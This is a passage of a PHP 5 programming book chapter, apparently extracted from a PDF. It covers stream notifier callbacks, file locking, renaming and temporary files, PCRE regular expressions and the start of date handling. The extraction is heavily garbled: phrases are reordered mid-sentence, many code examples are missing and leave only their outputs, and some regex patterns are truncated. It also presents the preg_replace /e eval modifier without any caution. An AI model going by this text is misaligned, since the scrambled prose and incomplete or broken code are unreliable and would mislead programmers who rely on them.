    301 Gutmans_ch09 Page 273 Thursday, September 23, 2004 2:47 PM 9.2 Files and Streams 273 } /* Url to fetch */ $url = $argv[1]; /* Bandwidth limiting */ if ($argc == 3) { $max_kb_sec = $argv[2]; } else { $max_kb_sec = 1000; } /* Cursor to column 1 for xterms */ $term_sol = "\x1b[1G"; $severity_map = array ( 0 => 'info ', 1 => 'warning', 2 => 'error ' ); /* Callback function for stream events */ function notifier($code, $severity, $msg, $xcode, $sofar, $max) { global $term_sol, $severity_map, $max_kb_sec, $size; /* Do not print status message prefix when the PROGRESS * event is received. */ if ($code != STREAM_NOTIFY_PROGRESS) { echo $severity_map[$severity]. ": "; } switch ($code) { case STREAM_NOTIFY_CONNECT: printf("Connected\n"); /* Set begin time for kb/sec calculation */ $GLOBALS['begin_time'] = time() - 0.001; break; case STREAM_NOTIFY_AUTH_REQUIRED: printf("Authentication required: %s\n", trim($msg)); break; case STREAM_NOTIFY_AUTH_RESULT: printf("Logged in: %s\n", trim($msg)); break; case STREAM_NOTIFY_MIME_TYPE_IS: printf("Mime type: %s\n", $msg); break; case STREAM_NOTIFY_FILE_SIZE_IS: printf("Downloading %d kb\n", $max / 1024); /* Set the global size variable */

    302 Gutmans_ch09 Page 274 Thursday, September 23, 2004 2:47 PM 274 Mainstream Extensions Chap. 9 $size = $max; break; case STREAM_NOTIFY_REDIRECTED: printf("Redirecting to %s...\n", $msg); break; case STREAM_NOTIFY_PROGRESS: /* Calculate the number of stars and stripes */ if ($size) { $stars = str_repeat ('*', $c = $sofar * 50 / $size); } else { $stars = ''; } $stripe = str_repeat ('-', 50 - strlen($stars)); /* Calculate download speed in kb/sec */ $kb_sec = ($sofar / (time() - $GLOBALS['begin_time'])) ➥ / 1024; /* Pause the script if we are above the maximum suck * speed */ while ($kb_sec > $max_kb_sec) { usleep(1); $kb_sec = ($sofar / (time() - $GLOBALS['begin_time'])) / 1024; ➥ } /* Display the progress bar */ printf("{$term_sol}[%s] %d kb %.1f kb/sec", $stars.$stripe, $sofar / 1024, $kb_sec); break; case STREAM_NOTIFY_FAILURE: printf("Failure: %s\n", $msg); break; } } /* Determine filename to save too */ $url_data = parse_url($argv[1]); $file = basename($url_data['path']); if (empty($file)) { $file = "index.html"; } printf ("Saving to $file.gz\n"); $fil = "compress.zlib://$file.gz"; /* Create context and set the notifier callback */ $context = stream_context_create(); stream_context_set_params($context, array ("notification" => ➥ "notifier"));

    303 Gutmans_ch09 Page 275 Thursday, September 23, 2004 2:47 PM 9.2 Files and Streams 275 /* Open the target URL */ $fp = fopen($url, "rb", false, $context); if (is_resource($fp)) { /* Open the local file */ $fs = fopen($fil, "wb9", false, $context); if (is_resource($fs)) { /* Read data from URL in blocks of 1024 bytes */ while (!feof($fp)) { $data = fgets($fp, 1024); fwrite($fs, $data); } /* Close local file */ fclose($fs); } /* Close remote file */ fclose($fp); /* Display download information */ printf("{$term_sol}[%s] Download time: %ds\n", str_repeat('*', 50), time() - $GLOBALS['begin_time']); } ?> Some events can be handled in the notify callback function. Although NOTIFY_CONNECT , NOTIFY_AUTH_REQUIRED most are only useful for debug purposes ( , NOTIFY_AUTH_REQUEST ), others can be used to perform some neat tricks, like the bandwidth limiting we do in the previous example. The following is a full list of all the different events. STREAM_NOTIFY_CONNECT This event is fired when a connection with the resource has been established— for example, when the script connected to a HTTP server. STREAM_NOTIFY_AUTH_REQUIRED When a request for authorization is complete, this event is triggered by the stream’s API. STREAM_NOTIFY_AUTH_RESULT As soon as the authentication has finished, this event is triggered to tell you if there was a successful authentication or a failure. STREAM_NOTIFY_MIME_TYPE_IS http:// and https:// The HTTP stream wrapper ( ) fires this event when Content-Type header is available in the response to the HTTP request. the STREAM_NOTIFY_FILE_SIZE_IS This event is triggered when the FTP wrapper figures out the size of the file, or when an HTTP wrapper sees the Content-Length header.

    304 Gutmans_ch09 Page 276 Thursday, September 23, 2004 2:47 PM 276 Mainstream Extensions Chap. 9 STREAM_NOTIFY_REDIRECTED This event is triggered by the HTTP wrapper when it encounters a redi- header). rect request ( Location: STREAM_NOTIFY_PROGRESS This is one of the fancier events; it is used extensively in our example. It’s sent as soon as a packet of data has arrived. In our example, we used this event to perform bandwidth limiting and display the progress bar. STREAM_NOTIFY_FAILURE When a failure occurs, such as the login credentials were wrong, the wrapper triggers this event. 9.2.7 Locking While writing to files that are possibly being read by other scripts at the same time, you will run into problems at some point because a write might not totally be completed while another script is reading the same file. The reading script will only see a partial file at that moment. Preventing this problem is locking . not hard to do, and the method for this is called PHP can set locks on files with the flock() function. Locking a file prevents a reading script from reading a file when it is being written to by another script; the only prerequisites for this is that both scripts (the reader and the writer) implement the locking. A simple set of scripts may look like this:

    305 Gutmans_ch09 Page 277 Thursday, September 23, 2004 2:47 PM 9.2 Files and Streams 277 fclose($fp); usleep(1); } ?> At the end of the script, we sleep for 1 second so that we are not using 100 percent CPU time. 9.2.8 Renaming and Removing Files unlink() function for deleting a file, which “unlinks” the file PHP provides the from a directory. On a UNIX-like system the file will only be deleted if no programs have this file in use. This means that with the following script, the bytes associated with the file will only be released to the operating system fclose() is executed: after the

    306 Gutmans_ch09 Page 278 Thursday, September 23, 2004 2:47 PM 278 Mainstream Extensions Chap. 9 During execution, you will not see the file in the directory anymore after unlink() still shows the file as being in use, and you can still is run. But, lsof read from it and write to it: $ sudo lsof | grep testfile php 14795 derick 3w REG 3,10 0 39636 /unlink/testfile ➥ (deleted) function is atomic if you move/ rename() Moving a file in PHP with the Atomic means rename the file to a place which is on the same file system. that nothing can interfere with this, and that it is always guaranteed not to be interrupted. In case you want to move a file to a different file system, it is safer to do it in two steps, like this: The renaming is still not atomic, but the file in the new location will .file.txt.tmp to file.txt never be there partially, because the renaming from is atomic as the rename is on the same file system. 9.2.9 Temporary Files In case you want to create a temporary file, the best way to do it is with the function. This function creates a temporary file with a unique ran- tmpfile() dom name in the current directory and opens this file for writing. This tempo- or rary file will be closed automatically when you close the file with fclose() when the script ends: In case you want to have more control over where the temporary file is cre- ated and about its name, you can use the function. On the contrary to tempnam() the function, this file will not be removed automatically: tmpfile()

    307 Gutmans_ch09 Page 279 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 279 The first parameter to the function specifies the directory where the tem- porary file is created, and the second parameter is the prefix that will be added to the random file name. E EGULAR XPRESSIONS 9.3 R Although regular expressions are very powerful, they are difficult to use, espe- cially if you’re new to them. So, instead of jumping on the functions that PHP supports for dealing with the regular expressions, we cover the pattern match- ing syntax first. If PCRE is enabled, the following should show up in phpinfo() output, as shown in Figure 9.3. PCRE phpinfo() output. Fig. 9.3 9.3.1 Syntax PCRE functions check whether a text string matches a pattern. The syntax of a pattern always has the following format: [] The modifiers are optional. The delimiter separates the pattern from the modifiers. PCRE uses the first character of the expression as the delimiter. You should use a character that does not exist in the pattern itself. Or, you can use a character that exists in your expression, but then you must escape it with the . Traditionally, the / is used as the delimiter, but other common \ | or delimiters are . It’s your choice. Personally, in most cases, we would pick @ the , unless we need to do matching on an email or similar pattern that con- @ tains the @ . , in which case we would use the / preg_match() The PHP function is used to match regular expressions. The first parameter passed to the function is the pattern . The second parameter is subject . The the string to be matched to the pattern and is also called the TRUE function returns FALSE (the pattern does not (the pattern matches) or match). You can also pass a third parameter—a variable name. The text that matches is stored by reference in the array with this name. If you don’t need to use the matching text but just want to know if there is a match or not, you can leave out the third parameter. In short, the format is as follows, with $matches being optional: $result = preg_match($pattern, $subject, $matches);

    308 Gutmans_ch09 Page 280 Thursday, September 23, 2004 2:47 PM 280 Mainstream Extensions Chap. 9 The examples in this section will not use the tags, but of Note: and course, they are required. PCRE’s matching syntax is very complex. A full dis- 9.3.1.1 Pattern Syntax cussion of all its details would exceed the scope of this book. We cover just the basics here, which is enough to be very useful. On most UNIX systems with to read about the the PCRE library installed, you can use man pcrepattern whole pattern matching language, or have a look at the (somewhat outdated) PHP Manual page at http://www.php.net/manual/en/pcre.pattern.syntax.php. But here we start with the simple things: The characters from the Table 9.1 are special char- 9.3.1.2 Metacharacters acters in the way that they can be used to construct patterns. Metacharacters Table 9.1 Character Description The general escape character. You need this in case you want to use \ any of the metacharacters in your pattern, or the delimiter. The back- slash also can be used to specify other special characters, which you can find in the next table. . Matches exactly one character, except a newline character. preg_match('/./', 'PHP 5', $matches); now contains $matches Array ( [0] => P ) Marks the preceding character or sub-pattern (optional). ? preg_match('/PHP.?5/', 'PHP 5', $matches); PHP5 This matches both PHP 5 . and + Matches the preceding character or sub-pattern one or more times. matches both 'ab' 'aab' , 'aaaaaaaab' , but not 'b' . , '/a+b/' TRUE in the example, but $matches does not also returns preg_match contain the excessive characters. preg_match('/a+b/', 'caaabc', $matches); now contains $matches Array ( [0] => aaab ) Matches the preceding character zero or more times. * matches both 'df' '/de*f/' 'def' and 'deeeef' . Again, excessive , characters are not part of the matched substring, but do not cause the match to fail.

    309 Gutmans_ch09 Page 281 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 281 Table 9.1 Metacharacters Description Character 'm' {m} Matches the preceding character or sub-pattern times in case the times if the variant is used. 'n' to 'm' variant is used, or {m} {m,n} {m.n} 'treeef' 'treef' . It is and 'tref' matches '/tre{1,2}f/' , but not possible to leave out the part. In 'n' part of the equation or the 'm' case there is no number in front of the comma, it means that the lower boundary for the number of matches is 0 and the upper boundary is determined by the number after the comma; in case the number after the comma is missing, then the upper boundary is undetermined. '/fo{2,}ba{,2}r/' matches 'foobar' , 'fooooooobar' , and 'fooobaar' , but not 'foobaaar' . ^ Marks the beginning of the subject. 'fghi' . ' /^ghi/' matches 'ghik' and 'ghi' , but not $ ) \n Marks the end of the subject, unless the last character is a newline ( character. In that case, it will match just before that newline character. matches "Rethans, Derick" and '/Derick$/' "Rethans, Derick\n" but not "Derick Rethans" . [ ... ] Makes a character class out of the characters between the opening and closing bracket. You can use this to create a group of characters to match. Using an hypen inside the character class creates a range of characters. In case you want to use the hypen as a character being part of the class, put it as last character in the class. The caret ( ) has ^ a special meaning if it is used as the first character in the class. In not this case, it negates the character class, which means that it does match with the characters listed. Example 1: preg_match('/[0-9]+/', 'PHP is released in 2005.', $matches); ➥ now contains $matches Array ( [0] => 2005 ) Example 2: preg_match('/[^0-9]+/', 'PHP is released in 2005.', $matches); ➥ now contains $matches Array ( [0] => PHP is released in ) $matches Note that the does not include the dot from the subject because a pattern always matches a consecutive string of characters. Inside the character class, you cannot use any of the mentioned meta- characters from this table, except for (to negate the character class), ^ - (to create a range), ] (to end the character class) and, the \ (to escape special characters).

    310 Gutmans_ch09 Page 282 Thursday, September 23, 2004 2:47 PM 282 Mainstream Extensions Chap. 9 Table 9.1 Metacharacters Character Description ( ... ) Creates a sub-pattern, which can be used to group certain elements in a pattern. For example, if we had the string and we 'PHP in 2005.' wanted to extract both the century and the year as two separate entries, in the array we would use the following: $matches regexp: '/([12][0-9])([0-9]{2})/' This creates two sub-patterns: to match all centuries from 10 to 29. ([12][0-9]) to match the year in the century. ([0-9]{2}) preg_match( '/([12][0-9])([0-9]{2})/', 'PHP in 2005.', $matches ); now contains $matches Array ( [0] => 2005 [1] => 20 [2] => 05 ) The element with index 0 is always the fully matched string, and all sub-patterns are assigned a number in the order in which they occur in the pattern. (?: ...) Creates a sub-pattern that is not captured in the output. You can use this to assert that the pattern is followed by something. preg_match('@([A-Za-z ]+)(?:hans)@', 'Derick Rethans', $matches); ➥ now contains $matches Array ( [0] => Derick Rethans [1] => Derick Ret ) As you can see, the full match string still includes the fully matched part of the subject, but there is only one element extra for the sub- pattern matches. Without the ?: in the second sub-pattern, there would also have been an element containing . hans

    311 Gutmans_ch09 Page 283 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 283 Metacharacters Table 9.1 Character Description (?P...) Creates a named sub-pattern. It is the same as a normal sub-pattern, but it generates additional elements in the $matches array. preg_match( '/(?P[12][0-9])(?P[0-9]{2})/', 'PHP in 2005.', $matches ); now contains: $matches Array ( [0] => 2005 [century] => 20 [1] => 20 [year] => 05 [2] => 05 ) This is useful in case you have a complex pattern and don’t want to bother finding out the correct index number in the array. $matches Let’s dissect some useful complex regular expressions 9.3.1.3 Example 1 that we can create with the metacharacters from Table 9.1: $pattern = "/^([0-9a-f][0-9a-f]:){5}[0-9a-f][0-9a-f]$/"; This pattern matches a MAC address —a unique number bound to a network card—with the format 00:04:23:7c5d:01. The pattern is bound to the start and end of our subject string with ^ and $ , and it contains two parts: ([0-9a-f][0-9a-f]:){5} . Matches the first five 2 character groups and the ☞ associated colon ([0-9a-f][0-9a-f]) . The sixth group of two digits ☞ This regexp could also have been written as /^([0-9a-f]{2}:){5}[0-9a- f]{2}$/ , which would have been a bit shorter. To test the text against the pat- tern, use the following code: preg_match($pattern, '00:04:23:7c:5d:01', $matches); print_r($matches);

    312 Gutmans_ch09 Page 284 Thursday, September 23, 2004 2:47 PM 284 Mainstream Extensions Chap. 9 With either pattern, the output would be the same, as follows: Array ( [0] => 00:04:23:7c:5d:01 [1] => 5d: ) 9.3.1.4 Example 2 "/([^<]+)<([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\\.)+[a-zA-Z0-9_-]+)>/" This pattern is used to match email addresses in the following format: 'Derick Rethans ' This pattern is not good enough to match all email addresses, and vali- dates some addresses that should not be matched. It only serves as a simple example. The first part is ([^<]+)< , as follows: . Delimiter used in this pattern. ☞ / . Subpattern that matches all characters unless it is the ‘<’ ☞ ( [^<]+) character. < The < character which is not part of any sub-pattern. . ☞ , ([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\\.)+[a-zA-Z0-9_-]+) The second part is which used to match the email address itself: [a-zA-Z0-9_-]+ . This matches everything until the @ and consists of one ☞ or more characters from the specified character class. ☞ . The @ sign. @ ([a-zA-Z0-9_-]+\\.)+ A subpattern that matches one or more levels of ☞ . . in the pattern is escaped with the \ , but subdomains. Notice that the \ is escaped with another \ . This is needed because the also note that this " ). You need to be careful with this. pattern is enclosed in double quotes ( It would usually be better to use single quotes for the pattern. ☞ . The top-level domain name (as in .com). As you can see, [a-zA-Z0-9_-]+ regexp the [a- is not correct here; the last part should have been simply z]{2,4} . Then there is the trailing > and delimiter.

    313 Gutmans_ch09 Page 285 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 285 $matches array after The following example shows the contents of the function: preg_match() running the '; preg_match( "/([^<]+)<([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\\.)+[a-zA-Z0 ➥ 9_]+)>/", $string, $matches ); print_r($matches); ?> The output is Array ( [0] => Derick Rethans [1] => Derick Rethans [2] => derick@php.net [3] => php. ) The fourth element cannot really be avoided because a subpattern was used for the (sub)domain part of the pattern, but of course, it doesn’t hurt to have it. As shown in the previous table, the 9.3.1.5 Escape Sequences character \ is the general escape character. In combination with the character that follows \ it, the stands for a special group of characters. Table 9.2 shows the different cases. Escape Sequences Table 9.2 Case Description \? \+ \* The first use of the escape character is to take away the special meaning \[ \] \{ of the other metacharacters. For example, if you need to match 4** in \} your pattern, you can use '/^4\*\*$/' Be careful with using double quotes around your patterns, because PHP gives a special meaning to the \ in there too. The following pattern is therefore equal to the one above. "/^4\\*\\*$/" "/^4\*\*$" (Note: In this case, \* is not would also have worked because recognized by PHP as a valid escape sequence, but what is shown here is not correct way to do it.)

    314 Gutmans_ch09 Page 286 Thursday, September 23, 2004 2:47 PM 286 Mainstream Extensions Chap. 9 Table 9.2 Escape Sequences Case Description \\ Escapes the \ so that it can be used in patterns. Now you are probably wondering why we used three slashes in as a special character $pattern1 ; this is because PHP recognizes the \ inside single quotes when it parses the script. This is because you need to use the \ ). $str = 'derick\'s'; to escape a single quote in such a string ( So, the first for the PHP parser, and that combined \ escapes the second \ character escapes the third slash for PCRE. The second pattern inside double quotes even has four slashes. This is has a special meaning to PHP. It means \5 because inside double quotes “the octal character 5,” which is, of course, not really useful at all, but it does give a problem for our pattern so we have to escape this slash with another slash, too. \a The BEL character (ASCII 7). \e The Escape character (ASCII 27). \f The Formfeed character (ASCII 12). \n The Newline character (ASCII 10). \r The Carriage Return character (ASCII 13). \t The Tab character (ASCII 9). \xhh hh for the Any character represented by its hexadecimal code ( ). Use \xdf (iso-8859-15), for example. ß \ddd ddd Any character represented by its octal code ( ). \d Any decimal digit, which is the same as specifying the character class [0-9] in a pattern. \D Any character that is not a decimal digit (is the same as [^0-9] ). \s Any whitespace character. (It the same as , or in words: tab, [\t\f\r\n ] formfeed, carriage return, newline, and space.) \S Any character that is not a whitespace character.

    315 Gutmans_ch09 Page 287 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 287 Table 9.2 Escape Sequences Case Description \w Any character that is part of a words , meaning any letter or digit, or are letters used in the current locale Letters the underscore character. (language-specific): outputs Array ( [0] => Montr ) Array ( [0] => Montréal ) For this example to work, you will need to have the locale nl_NL Tip: installed. Names of locales are system-dependent, too—for example, on Windows, the name of the locale is called nld_nld . See http://www.mac- max.org/locales/index_en.html for locale names for MacOS X and http:// msdn.microsoft.com/library/default.asp?url=/library/en-us/vclib/html/ _crt_language_strings.asp for Windows. \W set. \w Any character that does not belong to the \b An anchor point for a word boundary. In simple words, this means a point in a string between a word character ( ) and a non-word charac- \w ter ( \W ). The following example matches only the letters in the subject: outputs Array ( [0] => Testing123 )

    316 Gutmans_ch09 Page 288 Thursday, September 23, 2004 2:47 PM 288 Mainstream Extensions Chap. 9 Escape Sequences Table 9.2 Case Description \B \b , it acts as an anchor between either two word The opposite of the characters in the \w set, or between two non-word characters from the \W set. Because of the first point that matches this restriction, the fol- lowing example only prints estin : \Q ... \E Can be used inside patterns to turn off the special meaning of metachar- acters. The pattern will therefore match the string '.+*?' . '@\Q.+*?\E@' '/\w+\s+\w+/' 9.3.1.6 Examples Matches two words separated by whitespace. '/(\d{1,3}\.){3}\d{1,3}/' Matches (but not validates) an IP address. The IP address may appear anywhere in the string. outputs Array ( [0] => 212.187.38.47 [1] => 38. ) It is interesting to notice that the second element only contains the last one of the three matched subpatterns. 9.3.1.7 Lazy Matching Suppose you have the following string and you want to match the string inside the first tag: PHP has an excellent manual. The following pattern looks like it will work: '@(.*)@'

    317 Gutmans_ch09 Page 289 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 289 However, when you run the following example, you see that it outputs the wrong result: PHP has an '. 'excellent manual.'; $pattern = '@(.*)@'; preg_match($pattern, $str, $matches); print_r($matches); ?> outputs Array ( [0] => PHP [1] => PHP ) and the + are greedy operators. They try The example fails because the * will match every- to match as many characters as possible. In this case, thing to manual"> . You can tell the PCRE engine not to do this by appending the to the quantifier. If the ? ? is added, the PCRE engine tries to match as little characters/sub-patterns as possible, which is what we want here. @(.*?)@ is used, the output is correct: When the pattern Array ( [0] => PHP [1] => PHP ) However, this is not the most efficient way. It’s usually better to use the pattern @]+>([^<]+)@ , which requires less processing by the PCRE engine. 9.3.1.8 Modifiers The modifiers “modify” the behavior of the pattern match- ing engine. Table 9.3 lists them all with descriptions and examples. Modifiers Table 9.3 Modifier Description i Makes the PCRE engine match in a case-insensitive way. matches a letter in the range a..z. / /[a-z]/ [a-z]/i matches a letter in the ranges A..Z and a..z.

    318 Gutmans_ch09 Page 290 Thursday, September 23, 2004 2:47 PM 290 Mainstream Extensions Chap. 9 Table 9.3 Modifiers Modifier Description m ^ also matches Changes the behavior of the ^ $ in such a way that and just after a newline character, and $ also matches just before a newline character. outputs Array ( ) Array ( [0] => DEF ) s With this modifier set, the . (dot) also matches the newline character; without this modifier set (the default), it does not match the newline character. outputs Array ( ) Array ( [0] => BC DE )

    319 Gutmans_ch09 Page 291 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 291 Table 9.3 Modifiers Modifier Description x If this modifier is set, you can put arbitrary whitespace inside your pat- tern, except of course in character classes. outputs Array ( ) Array ( [0] => ABC ) e function. When it is set, it per- preg_replace() Only has an effect on the forms the normal replacement of back references and then evaluates the replacement string as PHP code. For an example, see the section “Replacement Functions.” A Setting this modifier has the same effect as using ^ as the first character in your pattern unless the m modifier is set. outputs Array ( [0] => BC ) Array ( )

    320 Gutmans_ch09 Page 292 Thursday, September 23, 2004 2:47 PM 292 Mainstream Extensions Chap. 9 Table 9.3 Modifiers Modifier Description D $ Makes the only match at the very end of the subject string, and not one character before the end in case that is a newline character. outputs Array ( [0] => BC ) Array ( ) U Swaps the “greediness” of the PCRE engine. Quantifiers become ungreedy by default, and the ? character turns on greediness. This makes the pattern we saw in an earlier example ('@(.*?)@') an equivalent of '@.*@U' . PHP has an '. ''. 'excellent manual.'; $pattern = '@(.*)@U'; preg_match($pattern, $str, $matches); print_r($matches); ?> outputs Array ( [0] => PHP has an excellent [1] => excellent )

    321 Gutmans_ch09 Page 293 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 293 Table 9.3 Modifiers Modifier Description X Turns on extra features in the PCRE engine. At the moment, the only feature it turns on is that the engine will throw an error in case an unknown escape sequence was detected. Normally, this would just have been treated as a literal. (Notice that we still have to escape the one \ for PHP itself.) output: Warning: preg_match(): Compilation failed: unrecognized character follows \ at offset 1 in /dat/docs/book/ prenticehall/php5powerprogramming/chapters/draft/10- mainstream-extensions/pcre/mod-X.php on line 4 u Turns on UTF-8 mode. In UTF-8 mode the PCRE engine treats the pat- tern as UTF-8 encoded. This means that the . (dot) matches a multi-byte character for example. (The next example expects you to view this book in the iso-8859-1 character set; if you view it in UTF-8, you'll see Dérick instead.) outputs Array ( ) Array ( [0] => Dérick ) 9.3.2 Functions Three groups of PCRE-related functions are available: matching functions, replacement functions, and splitting functions. , discussed previ- preg_match() ously, belongs to the first group. The second group contains functions that replace substrings, which match a specific pattern. The last group of functions split strings based on regular expression matches. is the function that matches one 9.3.2.1 Matching Functions preg_match() pattern with the subject string and returns either true or false depending whether the subject matched the pattern. It also can return an array contain- ing the contents of the different sub-pattern matches.

    322 Gutmans_ch09 Page 294 Thursday, September 23, 2004 2:47 PM 294 Mainstream Extensions Chap. 9 preg_match_all() is similar, except that it matches the pat- The function tern with the subject repeatedly. Finding all the matches is useful when extracting information from documents. Take, for example, the situation in which you want to extract email addresses from a web site: ([a-z.]+).?@[a-z0-9]+\.[a-z]{1,6})>/Ui', $doc, $matches ); var_dump($matches); ?> outputs Array ( [0] => Array ( [0] => [1] => [2] => [3] => ) [email] => Array ( [0] => bert @w3.org [1] => tantekc @microsoft.com [2] => ian @hixie.ch [3] => howcome @opera.com ) [1] => Array ( [0] => bert @w3.org [1] => tantekc @microsoft.com [2] => ian @hixie.ch [3] => howcome @opera.com ) [2] => Array ( [0] => bert [1] => tantekc [2] => ian [3] => howcome ) )

    323 Gutmans_ch09 Page 295 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 295 This example reads the contents of the CSS 2.1 specification into a string and decodes the HTML entities in it. The script then uses a preg_match_all() on the document, using a pattern that matches < + an email address + >, and $matches array . The output shows that stores the email addresses in the preg_match_all() doesn’t store all sub-pattern belonging to one match in one $matches array. Instead, it stores all the sub-pattern matches element of the $matches . belonging to the different matches into one element of egrep preg_grep() performs similarly to the UNIX command. It compares a pattern against elements of an array containing the subjects. It returns an array containing the elements that were successfully matched against the pat- tern. See the next example, which returns all valid IP addresses from the $addresses : array >'); $pattern = '@^((\d?\d|1\d\d|2[0-4]\d|25[0-5])\.){3}'. '(\d?\d|1\d\d|2[0-4]\d|25[0-5])@'; $addresses = preg_grep($pattern, $addresses); print_r($addresses); ?> In addition to the matching described in the 9.3.2.2 Replacement Functions previous section, PHP’s regular expression functions can also replace text based on pattern matching. The replacement functions can replace a sub- string that matches a subpattern with different text. In the replacement, you can refer to the pattern matches using back references . Here is an example that explains the replacement functions. In this example, we use to replace a pseudo-link, such as preg_replace() [link url="www.php.net"]PHP[/ link] , with a real HTML link: \\2'; $str = preg_replace($pattern, $replacement, $str); echo $str; ?> The script outputs PHP is cool.

    324 Gutmans_ch09 Page 296 Thursday, September 23, 2004 2:47 PM 296 Mainstream Extensions Chap. 9 ([^"]+) for the URL and . The pattern consists of two sub-patterns, (.*?) Instead of returning the substring of the subject that matches the two sub- patterns, the PCRE engine assigns the substring to back references, which you can access by using in the replacement string. If you don’t want to \\1 \\2 and $1 . Be careful when putting the replacement string into \\1 use , you may use double quotes, because you will have to escape either the slashes (so that a ) or the dollar sign (so that a back reference back reference looks like \\\\1 \$1 ). You should always put the replacement string in single quotes. looks like The full pattern match is assigned to back reference 0, just like the ele- matches preg_match() function. array of the ment with key 0 in the Tip: + number , you can If the replacement string needs to be back reference also use ${1}1 for the first back reference, followed by the number 1. preg_replace() can replace more than one subject at the same time by using an array of subjects. For instance, the following example script changes the format of the names in the array $names : The names array is changed to array('derick rethans', 'stig sæther bakken', 'andi gutmans'); However, names usually start with an uppercase letter. You can upper- case the first letter by using either the modifier or /e . preg_replace_callback() modifier uses the replacement string to be evaluated as PHP code. Its /e The return value is the replacement string:

    325 Gutmans_ch09 Page 297 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 297 If you need to do more complex manipulation with the matched patterns, evaluating replacement strings becomes complicated. You can use the preg_replace_callback() function instead: Here’s one more useful example:

    326 Gutmans_ch09 Page 298 Thursday, September 23, 2004 2:47 PM 298 Mainstream Extensions Chap. 9 } $data = "This item costs {amount: 27.95 %19%} ". "and the other one costs {amount: 29.95 %0%}.\n"; echo preg_replace_callback ( '/\{amount\:\ ([0-9.]+)\ \%([0-9.]+)\%\}/', 'currency_output_vat', $data ); ?> This example originates from a webshop where the format and exchange rate are decoupled from the text, which is stored in a cache file. With this solu- tion, it is possible to use caching techniques and still have a dynamic exchange rate. allow the pattern to be an preg_replace() preg_replace_callback() and array of patterns. When an array is passed as the first parameter, every pat- also enables you to pass an tern is matched against the subject. preg_replace() array for the replacement string when the first parameter is an array with patterns: @[A-Z]@e matches any uppercase character and, because The first pattern e the strtolower(\\0) is modifier is used, the accompanying replacement string [\W\] evaluated as PHP code. The second pattern matches all non-word char- acters and, because the second replacement string is simply _ , all non-word characters are replaced by the underscore ( _ ). Because the replacements are done in order, the third pattern matches the already modified subject, replac- _ with one. The subject string contains the fol- ing all multiple occurrences of lowing after each pattern/replacement match, as shown in Table 9.4. Table 9.4 Replacement Steps Result Step Before: This is a nice text; with punctuation AND capitals this is a nice text; with punctuation and capitals Step 1: Step 2: this_is_a_nice_text__with_punctuation_and_capitals Step 3: this_is_a_nice_text_with_punctuation_and_capitals

    327 Gutmans_ch09 Page 299 Thursday, September 23, 2004 2:47 PM 9.3 Regular Expressions 299 The last group of functions includes only 9.3.2.3 Splitting Strings preg_split() , which can be used to split a string into substrings by using a reg- function explode() ular expression match for the delimiters. PHP provides an explode() can only use a simple string as the delim- that also splits strings, but iter. explode() is much faster than using a regular expression, so you might be when possible. A simple example of preg_splits() ’s better off using explode() usage might be to split a string into the words it contains. See the following example: The script outputs Array ( [0] => This [1] => is [2] => an [3] => example [4] => for [5] => preg_split [6] => ) As you can see, the last element is empty. By default, the function returns empty elements, too. The character(s) before the end of the string are non-word characters so they act as a delimiter, resulting in an empty element. preg_split() function: a limit and a You can pass two more parameters to the flag. The “limit” parameter controls how many elements are returned before preg_split() the splitting stops. In the example, two elements are returned: The output is Array ( [0] => This [1] => is an example for preg_split(). )

    328 Gutmans_ch09 Page 300 Thursday, September 23, 2004 2:47 PM 300 Mainstream Extensions Chap. 9 -1 as the limit. means that there is no In the next example, we use -1 limit at all, and allows us to pass flags without shortening our output array. Three flags specify what is returned: ☞ Prevents empty elements from ending up in the PREG_SPLIT_NO_EMPTY. returned array: The script outputs Array ( [0] => This [1] => is [2] => an [3] => example ) PREG_SPLIT_DELIM_CAPTURE. ☞ Returns the delimiters itself, but only if the delimiters are surrounded by parentheses. We combine the flag with : PREG_SPLIT_NO_EMPTY The script outputs Array ( [0] => This [1] => [2] => is [3] => [4] => an [5] => [6] => example [7] => . )

    329 Gutmans_ch09 Page 301 Thursday, September 23, 2004 2:47 PM 9.4 Date Handling 301 PREG_SPLIT_OFFSET_CAPTURE. Specifies that the function return a two- ☞ dimensional array containing both the text and the offset in the string where the element started. In this example, we combine all three flags: The script outputs (reformatted): array ( 0 => array ( 0 => 'This', 1 => 0 ), 1 => array ( 0 => ' ', 1 => 4 ), 2 => array ( 0 => 'is', 1 => 5 ), 3 => array ( 0 => ' ', 1 => 7 ), 4 => array ( 0 => 'an', 1 => 8 ), 5 => array ( 0 => ' ', 1 => 10 ), 6 => array ( 0 => 'example', 1 => 11 ), 7 => array ( 0 => '.', 1 => 18 ), ) 9.4 D H ANDLING ATE PHP has a range of functions that handle date and time. Some of these func- tions work with a so-called , which is the number of seconds UNIX timestamp since January 1, 1970 at 00:00:00 GMT, the beginning of the UNIX epoch. Because PHP only handles unsigned 32-bit integers and most operating sys- tems don’t support negative timestamps, the range in which most of the PHP date functions operate is January 1, 1970 to January 19, 2038. The PEAR::Date package handles dates outside this range and also in a platform-independent way. 9.4.1 Retrieving Date and Time Information time() function. It The easiest way of obtaining the current time is with the accepts no parameters and simply returns the current timestamp:

